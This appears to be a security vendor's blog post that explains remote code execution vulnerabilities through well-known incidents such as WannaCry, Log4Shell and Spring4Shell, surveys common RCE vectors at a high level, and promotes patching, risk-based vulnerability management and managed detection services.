There were nearly 29,000 vulnerabilities published in 2023, 3,800 more than in 2022. More troubling than the sheer volume of vulnerabilities in 2023 is that over half of them were given a CVSS score indicating high or critical severity — an increase of 57% YoY.
However, not all vulnerabilities become go-to attack vectors for cybercriminals, and security professionals can’t remediate every vulnerability that is published. The objective becomes prioritization and identifying the most dangerous and potentially damaging.
And one type has risen to the forefront: remote code execution (RCE).
According to Arctic Wolf Labs, nine of the top 10 vulnerabilities of 2023 were RCEs. These nine vulnerabilities were found in 42% of all engagements with Arctic Wolf Incident Response and, with the continued adoption of the cloud and the ubiquity of hybrid work models, we only expect these types of vulnerabilities to grow in number and severity.
RCEs are having a moment, and their continued rise poses real cyber risk to organizations across the globe.
What is Remote Code Execution?
Often launched directly from the internet, remote code execution gives the attacker the ability to take control over a process or device and run their own code remotely, without needing to be in the same physical space as the system or device. This separates it from an arbitrary code execution (ACE), which is launched from within a system’s local area network (LAN). Through remote code execution, an attacker can run code from outside the system that triggers an internal ACE.
Once an attacker successfully exploits an RCE vulnerability, they can potentially take complete control over the target system, allowing them to steal sensitive data, disrupt operations, or launch further attacks.
Infamous RCE Attacks
WannaCry
Perhaps the most insidious of all ransomware strains, WannaCry brought ransomware into the mainstream in 2017. The WannaCry ransomware worm spread by exploiting a vulnerability in the Server Message Block Protocol (SMB). This vulnerability allowed an attacker to execute malicious code on vulnerable machines, enabling the ransomware to access and encrypt valuable files. WannaCry managed to affect more than 200,000 Windows computers in 150 countries. It was especially dangerous — and potentially deadly — as the UK’s National Health Service Hospitals were among the most devastated. The Five Eyes Alliance — an intelligence alliance consisting of Australia, Canada, New Zealand, the United Kingdom, and the United States — have attributed the attack to North Korean threat actors.
SolarWinds
In one of the most catastrophic data breaches of 2020, the Russian SVR leveraged a zero-day RCE vulnerability in the SolarWinds Orion Platform to deploy malware across an estimated 18,000 private and government affiliated networks, gaining access to an abundance of identifiable information, including source code, passwords, financial information, and usernames.
Log4j / Log4Shell
In early December 2021, Log4Shell (CVE-2021-44228) was first identified as a zero-day remote code execution vulnerability in Apache Log4j 2. An unauthenticated, remote threat actor could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of Log4j. Arctic Wolf Labs observed one in four organizations in our customer base were targeted with Log4Shell exploitation attempts between January and December of 2022. Log4Shell exploitation was the root point of compromise in 11% of all Arctic Wolf® Incident Response cases in 2022 for customers where incident response services were the customer’s first engagement with Arctic Wolf.
Spring4Shell
In late March 2022, Spring published a security advisory confirming Spring4Shell, a remote code execution (RCE) vulnerability in the Spring Framework. In addition to the security advisory, Spring released patches addressing the vulnerability. The vulnerability, assigned CVE-2022-22965, received a critical severity rating. Notably, the vulnerability impacted not only Spring MVC but also Spring WebFlux applications running JDK 9+. Threat actors were able to leverage this vulnerability to deploy cryptominers and botnet malware into environments.
RCE attacks are continuing at alarming rates. In fact, in September 2024, Arctic Wolf Labs observed the notorious Akira ransomware group utilizing a specific RCE vulnerability exploit (CVE-2024-40766) as their initial access method for ransomware attacks on multiple organizations.
How Remote Code Execution Works
RCE vulnerabilities allow an attacker to execute arbitrary code on a remote system. This means that an attacker can gain unauthorized access to a system and execute commands or run programs remotely, without having or needing physical access to the target system.
It’s become such a popular vulnerability type for exploit because it gives threat actors initial access into a target network without the need to, for example, execute an identity-based attack like social engineering, which can give them valid credentials to provide that same initial access. With RCE, threat actors can remotely enter a network without relying on credentials at all.
There are several ways a threat actor can achieve remote code execution, including:
Injection
An injection exploit executes malicious queries to take control of a database server that is running a web application. For instance, in a SQL injection, the threat actor injects malicious data the system interprets as a command, allowing them to bypass authentication and authorization of the app to retrieve data from the entire SQL database. It can also be used to add, modify, or delete data from the database.
SQL injections are commonly used, Arctic Wolf saw a 125% increase in indicators of SQL activity in Nov. 2023, because tools like sqlmap offer a legitimate way into an environment with little resistance or possibility of detection.
Deserialization
Serialization is the transformation of an object — say a file folder — into a format that can be preserved, stored, and transmitted, much in the way a .zip file allows you to send a folder containing multiple files as a single unit. Deserialization, then, is the process of undoing that transformation so that the object can be read and/or executed. However, if the deserialized object is unencrypted, threat actors can modify it with malicious code, which leads to unauthenticated RCE.
Out-of-Bounds Write
In this exploit, a threat actor leverages a software’s incorrectly formatted memory allocation to write data beyond the boundaries of a buffer – a temporary data storage location utilized while data is in transfer — which leads to the execution of arbitrary code.
Improper Input Validation
When software applications do not properly sanitize user input, it can allow attackers to upload a file containing malicious code, which the application then executes, believing it to be valid.
The important thing to note is that remote code execution is possible in any computer software or application and is not restricted by programming languages or operating systems. This is another reason why RCE exploits have risen so sharply in the past few years, with no signs of slowing down.
No two RCE’s are the same, and some vulnerabilities, like Spring4Shell, offer multiple avenues for threat actors to take. It’s dependent on the specificities of the vulnerability and the application affected by it.
How To Defend Against Remote Code Execution
One of the primary ways to prevent RCE is through timely software updates and patches. As vulnerabilities are discovered in software or an application, the companies behind them will release updates or patches to users. Ensuring that you’re staying on top of this and keeping your software and applications current will help reduce the risk of RCE.
Another effective — and more proactive — method of preventing RCE is through a risk-based vulnerability management program. Most critical severity CVE’s that are discovered lead to RCE so it’s important to scan for vulnerabilities in your environment and stay on top of your patching schedule.
Because every organization has different security and business needs that can change, the goal with vulnerability management should not be to eliminate every possible vulnerability, but to take a risk-based approach that reduces risk over time.
Learn how Arctic Wolf, and Arctic Wolf Labs, helps organizations stay on top of CVEs and other, vulnerability-based threats.
Additionally, being able to detect malicious actions, including possible RCE exploits, in real-time, and respond to them swiftly is paramount for overall protection. Because not every vulnerability can be patched, having a monitoring system in place can help your organization detect an attempted exploitation before it takes hold, and a cyber attack truly begins.
When To Partner With a Third-Party
Many IT and security teams struggle under a lack of budget and a shortage of available security experts, meaning that providing 24×7 monitoring of their entire environment, as well as prompt detection and response, is already challenging to achieve in-house. Viewed through that lens, adding proactive vulnerability and risk management to that workload is an additional burden that often falls by the wayside.
That’s when partnering with a security operations solutions provider can provide valuable assistance in determining your organization’s unique risk appetite — the amount of risk you’re willing to take on to conduct business — as well as patching and mitigating the vulnerabilities that are most dangerous to your organization and providing 24×7 monitoring, detection, and response solutions.
A managed security operations provider like Arctic Wolf not only offers visibility and response from a seasoned team of security experts but also works to discover and assess the risks, vulnerabilities included, by contextualizing your attack surface coverage across your various environments, helping you implement effective vulnerability management while improving your overall security posture and reducing your risk.
Learn more about the vulnerabilities your organization needs to look out for in the Arctic Wolf 2024 Security Operations Report.
See what other organizations are concerned about, and the steps they’re taking to reduce risk, with The State of Cybersecurity: 2024 Trends Report.
